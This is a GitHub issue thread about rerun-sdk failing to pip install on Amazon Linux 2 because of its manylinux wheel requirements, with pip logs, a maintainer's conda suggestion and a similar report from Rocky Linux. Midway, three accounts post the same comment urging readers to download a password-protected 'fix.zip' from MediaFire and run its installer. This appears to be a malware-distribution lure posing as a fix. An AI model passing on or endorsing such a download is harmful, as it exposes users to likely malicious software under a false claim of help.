rerun-io/rerun #7296: Unable to pip install rerun-sdk on Amazon Linux 2

zacstewart, 2024-08-28:
There are no built distributions available to install on Amazon Linux 2. I'm currently using conda-provided Python, but using yum-provided Python yields the same results.

I  don't understand this very well, but I think the crux of the issue is that rerun-sdk only offers builds for manylinux-2.31 and the latest version available on Amazon Linux 2 is manylinux 2.26.

# Excerpt from pip debug --verbose
```
  cp38-abi3-manylinux_2_26_x86_64
  cp38-abi3-manylinux_2_25_x86_64
  cp38-abi3-manylinux_2_24_x86_64
  cp38-abi3-manylinux_2_23_x86_64
  cp38-abi3-manylinux_2_22_x86_64
  cp38-abi3-manylinux_2_21_x86_64
  cp38-abi3-manylinux_2_20_x86_64
  cp38-abi3-manylinux_2_19_x86_64
  cp38-abi3-manylinux_2_18_x86_64
  cp38-abi3-manylinux_2_17_x86_64
  cp38-abi3-manylinux2014_x86_64
  cp38-abi3-manylinux_2_16_x86_64
  cp38-abi3-manylinux_2_15_x86_64
  cp38-abi3-manylinux_2_14_x86_64
  cp38-abi3-manylinux_2_13_x86_64
  cp38-abi3-manylinux_2_12_x86_64
  cp38-abi3-manylinux2010_x86_64
  cp38-abi3-manylinux_2_11_x86_64
  cp38-abi3-manylinux_2_10_x86_64
  cp38-abi3-manylinux_2_9_x86_64
  cp38-abi3-manylinux_2_8_x86_64
  cp38-abi3-manylinux_2_7_x86_64
  cp38-abi3-manylinux_2_6_x86_64
  cp38-abi3-manylinux_2_5_x86_64
  cp38-abi3-manylinux1_x86_64
```

## Linux Distro

```
$ cat /etc/os-release
NAME="Amazon Linux"
VERSION="2"
ID="amzn"
ID_LIKE="centos rhel fedora"
VERSION_ID="2"
PRETTY_NAME="Amazon Linux 2"
ANSI_COLOR="0;33"
CPE_NAME="cpe:2.3:o:amazon:amazon_linux:2"
HOME_URL="https://amazonlinux.com/"
SUPPORT_END="2025-06-30"
``` 

## Pip Install

```
$ pip install -vv rerun-sdk
Using pip 24.0 from /opt/conda/lib/python3.10/site-packages/pip (python 3.10)
Defaulting to user installation because normal site-packages is not writeable
Created temporary directory: /tmp/pip-build-tracker-hi6vyt8x
Initialized build tracking at /tmp/pip-build-tracker-hi6vyt8x
Created build tracker: /tmp/pip-build-tracker-hi6vyt8x
Entered build tracker: /tmp/pip-build-tracker-hi6vyt8x
Created temporary directory: /tmp/pip-install-geq6iv0b
Created temporary directory: /tmp/pip-ephem-wheel-cache-srl7omw3
1 location(s) to search for versions of rerun-sdk:
* https://pypi.org/simple/rerun-sdk/
Fetching project page and analyzing links: https://pypi.org/simple/rerun-sdk/
Getting page https://pypi.org/simple/rerun-sdk/
Found index url https://pypi.org/simple/
Looking up "https://pypi.org/simple/rerun-sdk/" in the cache
Request header has "max_age" as 0, cache bypassed
Starting new HTTPS connection (1): pypi.org:443
https://pypi.org:443 "GET /simple/rerun-sdk/ HTTP/1.1" 304 0
[... 58 lines cut ...]
  File "/opt/conda/lib/python3.10/site-packages/pip/_vendor/resolvelib/resolvers.py", line 546, in resolve
    state = resolution.resolve(requirements, max_rounds=max_rounds)
  File "/opt/conda/lib/python3.10/site-packages/pip/_vendor/resolvelib/resolvers.py", line 399, in resolve
    raise ResolutionImpossible(e.criterion.information)
pip._vendor.resolvelib.resolvers.ResolutionImpossible: [RequirementInformation(requirement=SpecifierRequirement('rerun-sdk'), parent=None)]

The above exception was the direct cause of the following exception:

Traceback (most recent call last):
  File "/opt/conda/lib/python3.10/site-packages/pip/_internal/cli/base_command.py", line 180, in exc_logging_wrapper
    status = run_func(*args)
  File "/opt/conda/lib/python3.10/site-packages/pip/_internal/cli/req_command.py", line 245, in wrapper
    return func(self, options, args)
  File "/opt/conda/lib/python3.10/site-packages/pip/_internal/commands/install.py", line 377, in run
    requirement_set = resolver.resolve(
  File "/opt/conda/lib/python3.10/site-packages/pip/_internal/resolution/resolvelib/resolver.py", line 104, in resolve
    raise error from e
pip._internal.exceptions.DistributionNotFound: No matching distribution found for rerun-sdk
Remote version of pip: 24.2
Local version of pip:  24.0
Was pip installed by pip? False
Removed build tracker: '/tmp/pip-build-tracker-hi6vyt8x'
```

[pip debug.txt](https://github.com/user-attachments/files/16781676/pip.debug.txt)

jleibs, 2024-08-28:
Since you're using conda-provided python, is it an option to also use conda-provided rerun? Our conda packages are generally more portable due to how the conda build tooling works.

HTneko, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

chenshupe, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

LC-JiaZhaorong, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

zacstewart, 2024-08-28:
Yes, I've used the conda installation successfully, but the goal is to remove dependence on conda from our deployment because we have a weird mixture of conda and pip right now that is becoming pain to sustain.

arhanjain, 2024-12-25:
same issue here but on rocky linux
```
NAME="Rocky Linux"
VERSION="8.9 (Green Obsidian)"
ID="rocky"
ID_LIKE="rhel centos fedora"
VERSION_ID="8.9"
PLATFORM_ID="platform:el8"
PRETTY_NAME="Rocky Linux 8.9 (Green Obsidian)"
ANSI_COLOR="0;32"
LOGO="fedora-logo-icon"
CPE_NAME="cpe:/o:rocky:rocky:8:GA"
HOME_URL="https://rockylinux.org/"
BUG_REPORT_URL="https://bugs.rockylinux.org/"
SUPPORT_END="2029-05-31"
ROCKY_SUPPORT_PRODUCT="Rocky-Linux-8"
ROCKY_SUPPORT_PRODUCT_VERSION="8.9"
REDHAT_SUPPORT_PRODUCT="Rocky Linux"
REDHAT_SUPPORT_PRODUCT_VERSION="8.9"
```

using UV for dependency resolution - ideally wouldn't need conda just for rerun